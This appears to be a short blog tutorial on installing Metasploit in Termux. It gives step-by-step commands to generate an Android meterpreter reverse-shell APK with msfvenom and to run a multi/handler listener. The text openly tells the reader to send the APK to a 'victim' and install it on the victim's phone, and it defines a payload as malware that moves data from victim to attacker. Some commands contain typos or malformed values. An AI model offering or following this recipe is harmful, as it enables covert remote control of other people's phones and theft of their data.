Full guide for installation and usage of metasploit in termux.



METASPLOIT INSTALLATION AND RUN COMMANDS

What is payload ?
A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload. 

Commands :

$ apt-get update

$ apt-get updgrade

pkg install unstable-repo OR apt install unstable-repo

pkg install metasploit OR apt install metasploit

After installation

$ msfconsole

Wait 2min until open

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk

Want IP go to google search what is my IPv4 address 1st link open copy your ip

Payload is on internal storage send payload to victim install it on victim mobile

$ pkg install postgresql

$ pg_ctl -D $PREFIX/var/lib/postgresql start

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk

$ msfconsole

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set LHOST

$ set LPORT

$ exploit






Follow us for more...

No comments:

Post a Comment

How to Set Up PHPUnit in Laravel .mp4

Here is a complete beginner-friendly, step-by-step guide on: Download :  How to Set Up PHPUnit in Laravel (Full Explanation).mp4 Testing is...